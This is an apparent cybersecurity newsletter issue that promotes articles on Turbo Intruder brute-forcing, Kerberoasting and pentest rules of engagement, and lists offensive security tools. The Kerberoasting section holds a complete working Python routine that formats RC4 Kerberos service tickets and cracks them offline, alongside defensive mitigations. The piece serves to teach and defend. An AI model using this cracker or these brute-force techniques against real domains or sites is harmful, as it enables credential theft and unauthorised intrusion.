SecPro #49: Turbo Intruding, Roasting Kerberos, and Setting the Rules of Engagement.
This week’s a bumper issue that not only brings you all the premium articles you have been waiting for, but also a giveaway: our lucky winners get a free three-month subscription to Packt Plus, on us. How do you win? You’ll need to share this newsletter around to earn raffle tickets. We’ll draw tickets from a virtual hat next week and email the winners. Sound good? Good.
Of course, don’t forget to claim your free eBook by clicking on the survey below. This offer is available for everyone currently subscribed to the SecPro Weekly Insider, including those of you still enjoying the trial period. Fill it in, tell us what you think, and we’ll send you an eBook as a thank you.
Turbo Intruder – hacking at light speed
By Indrajeet Bhuyan
Last week I wrote an article called “5 must-have Burp Suite extensions”. One of the extensions I mentioned was Turbo Intruder, and today it gets an article of its own. Why? Because the tool is good enough to deserve one.
We all love Burp Suite, but the one thing we hate about it is the throttle: in the Community edition, Intruder is deliberately rate-limited. You might say you already have Burp Professional and can run Intruder at full speed, so do you still need Turbo Intruder? Yes, because Turbo Intruder is so fast that even an unthrottled Intruder cannot keep up with it.
How often do you find yourself running scans that take forever to complete? Often we end up cancelling the scan because it takes too long. Let me introduce you to Turbo Intruder: a research-grade, open-source Burp Suite extension built with speed in mind. It can send a very large number of HTTP requests and analyse the results, it uses very little memory, and the best part is that it’s completely free.
Here are some of the features of Turbo Intruder :
- Fast – Turbo Intruder uses an HTTP stack hand-coded from scratch with speed in mind. As a result, on many targets, it can seriously outpace even fashionable asynchronous Go scripts.
- Scalable – Turbo Intruder can achieve flat memory usage, enabling reliable multi-day attacks. It can also be run in headless environments via the command line.
- Flexible – Attacks are configured using Python. This enables the handling of complex requirements such as signed requests and multi-step attack sequences. Also, the custom HTTP stack means it can handle malformed requests that break other libraries.
- Convenient – Boring results can be automatically filtered out by an advanced diffing algorithm adapted from Backslash Powered Scanner. This means you can launch an attack and obtain useful results in two clicks.
Installing Turbo Intruder
Open Burp Suite, go to the Extender tab and select the BApp Store.
Find Turbo Intruder in the list and select it.
Click Install.
How to use turbo intruder
First, intercept the request and send it to Turbo Intruder from the right-click context menu.
Select a template. The bundled templates cover most needs, from simple fuzzing to multi-step sequences. For this example I’m using basic.py to brute-force web directories.
Here is the code for basic.py
Now add the wordlist, set the options shown, and click Attack.
With this configuration we get the following requests per second (RPS):
Now let’s change the configuration:
Here the number of concurrent connections has been raised to 22.
The RPS now rises to around 25, considerably faster than before. RPS is bounded by the target as much as by the tool: once the server’s backlog saturates, extra connections add timeouts and resets rather than throughput, so raise the number gradually and watch the error column as well as the RPS figure.
Want to read the rest of Indrajeet’s walkthrough? Click the link below and access the entire breakdown of how to get the best out of Turbo Intruder. 👇
Kerberoasting – Hacking Active Directory Password Hashes
By Andy Pantelli
Kerberoasting, catalogued by MITRE ATT&CK as technique T1558.003, is used by financially motivated actors, including groups like FIN7, as a step on the way to deploying ransomware. This article aims to dig a little deeper and explain just what the attack is and how it works.
Kerberos is the domain’s legitimate ticket-granting service. A Service Principal Name (SPN) uniquely identifies an instance of a Windows service, and the account that runs that service, the service account, must have an SPN registered on it so that clients can request a ticket for it. The attacker can target every service account in the domain, or first carry out internal reconnaissance to single out service accounts holding the privileges they want. Either way, the first step is enumerating the SPNs of the service accounts being targeted.
Risk varies with the attack technique and with each adversary’s motive. When a service ticket is requested from the Domain Controller’s Key Distribution Center (KDC), part of the returned ticket is encrypted under a key derived from the service account’s password; with the RC4 encryption type that key is simply the account’s NT hash, so the encrypted portion can be brute-forced offline, without touching the domain again, until the plaintext password is recovered. A cracked service account password can then be used for privilege escalation, persistence or lateral movement as a valid account.
Breaking this down:
- The attacker gains access to a Windows network as any authenticated domain user.
- Kerberoasting is used to request service tickets for accounts with SPNs and brute-force them offline to recover service account passwords.
- The attacker can then move laterally, escalate privileges or pivot within the network.
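The three steps above turn on one property of RC4 (etype 23) tickets: the KDC encrypts the ticket’s enc-part under a key that is nothing more than the service account’s NT hash, and hands that blob to any authenticated user who asks. The following added example, which is not the article’s code nor that of any tool listed below, builds such a ticket, prints it in the `$krb5tgs$23$` line that GetUserSPNs.py-style tools emit, and recovers the password offline the way hashcat mode 13100 does. The account, realm, SPN, password and ticket bytes are constructed, and MD4 is reimplemented because hashlib on OpenSSL 3 builds often lacks it.

```python
"""Why an RC4 (etype 23) service ticket can be cracked offline.  Added
illustration: not code from the article or from any of the tools it lists.
Account, realm, SPN, password and ticket bytes below are all constructed."""
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
KEY_USAGE_TGS_REP_TICKET = 2   # RFC 4120 key usage number for the ticket enc-part


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data):
    """Pure-Python MD4 (RFC 1320): OpenSSL 3 builds often ship hashlib without it."""
    msg = bytearray(data)
    bit_len = (8 * len(msg)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack('<Q', bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # Each round: (mixing function, message-word order, rotation amounts, additive constant).
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), tuple(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack('<16I', bytes(msg[off:off + 64]))
        a, b, c, d = state
        for f, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = _lrot((a + f(b, c, d) + X[idx] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack('<4I', *state)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE password).  For etype 23 this is the Kerberos key itself."""
    return md4(password.encode('utf-16-le'))


def rc4(key, data):
    """Plain RC4 keystream XOR (used by etype 23); encryption and decryption are identical."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key, plaintext, usage=KEY_USAGE_TGS_REP_TICKET, confounder=None):
    """RFC 4757 RC4-HMAC encryption as the KDC applies it to the ticket: returns (checksum, edata)."""
    confounder = confounder or os.urandom(8)
    k1 = hmac.new(key, struct.pack('<I', usage), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)


def format_krb5tgs23(user, realm, spn, checksum, edata):
    """The hashcat -m 13100 line that GetUserSPNs.py-style tools print for etype 23 tickets."""
    return '$krb5tgs$23$*%s$%s$%s*$%s$%s' % (user, realm, spn, checksum.hex(), edata.hex())


def crack_krb5tgs23(hash_line, candidates):
    """Offline dictionary attack: one MD4, three HMAC-MD5s and one RC4 per guess, no KDC contact."""
    checksum_hex, edata_hex = hash_line.rsplit('$', 2)[1:]
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    usage = struct.pack('<I', KEY_USAGE_TGS_REP_TICKET)
    for password in candidates:
        k1 = hmac.new(nt_hash(password), usage, hashlib.md5).digest()
        k3 = hmac.new(k1, checksum, hashlib.md5).digest()
        decrypted = rc4(k3, edata)
        # The right key is the one whose checksum over the decrypted data matches the ticket's.
        if hmac.compare_digest(hmac.new(k1, decrypted, hashlib.md5).digest(), checksum):
            return password
    return None


def demo():
    """Constructed scenario: svc_sql runs MSSQL under a guessable password."""
    service_key = nt_hash('Summer2021!')
    ticket_plaintext = b'constructed EncTicketPart (a real one is DER-encoded ASN.1)'
    checksum, edata = rc4_hmac_encrypt(service_key, ticket_plaintext)
    line = format_krb5tgs23('svc_sql', 'CORP.LOCAL', 'MSSQLSvc/db01.corp.local:1433', checksum, edata)
    return crack_krb5tgs23(line, ['password', 'Welcome1', 'Summer2021!', 'P@ssw0rd'])
```

Everything after the single ticket request is offline: no further KDC contact, no lockouts, no failed-logon events. AES tickets (etype 17/18, hashcat modes 19600/19700) derive the key with PBKDF2 at thousands of iterations, which is why the standard mitigations are long managed passwords for service accounts (gMSA where possible), AES-only service accounts, and alerting on Event 4769 ticket requests with encryption type 0x17 (RC4) for accounts that should be using AES.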
Want to read the rest of Andy’s article? Click the link below to access the whole tutorial! 👇
The Rules of Engagement: Pentesting and helping your clients understand
Pentesting is a necessary service that a growing number of businesses are starting to use, but the tendency isn’t universal. Some business leaders see it as an unnecessary cost; others simply don’t understand what pentesting is or why it is useful. If you’re an aspiring penetration tester, that is a difficult problem to overcome. How do you tell prospective clients exactly what they’ll receive?
Well, that’s easy: with a Rules of Engagement document. Much like the battles of old, establishing rules for any conflict is necessary to determine what is honourable, err, I mean included in the service. For anyone breaking out to start their own pentesting business, just like any freelancer, you need to state what you are willing to offer, what the client should expect to receive, and what they can’t add for free at the last minute!
Want to know how to build pentesting rules of engagement agreements? Click the link below to find out the necessary information. 👇
The SecPro Giveaway
Want to win one of 10 free 3-month Packt+ unlimited subscriptions? We’re giving away these fantastic prizes to our readers and there’s only one thing you have to do – share this newsletter with your friends and in your cybersecurity circles!
Click below to get started!
This Week’s Tutorials & Explainers
This week, we looked at the penultimate entry in our MITRE ATT&CK framework breakdown – T1055: Process Injection. Click the link to read the article!
No news is good news, but we’ve rounded up the big events of the last week to send to you anyway. Check out the future of FIDO and other stories by clicking the link.
Secret Knowledge: Building Your Security Arsenal
Here’s another edition of Secret Knowledge, with plenty of tools to help you test and secure your infrastructure systems. All tools are chosen by our crack team of researchers on the most important metric of all – sounding a bit interesting.
- skelsec/kerberoast: Kerberoast attack -pure python-
- ShutdownRepo/targetedKerberoast: targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print “kerberoast” hashes for user accounts that have a SPN set.
- Retrospected/kerbmon: KerbMon pulls the current state of the Service Principal Name (SPN) records and sAMAccounts that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). It stores these results in a SQLite3 database.
- almandin/fuxploider: Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws.
- ucsb-seclab/dr_checker: DR. CHECKER : A Soundy Vulnerability Detection Tool for Linux Kernel Drivers. This repo contains all the sources, including setup scripts. Now with an Amazing UI to view the warnings along with corresponding source files.
- splunk/attack_range: A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk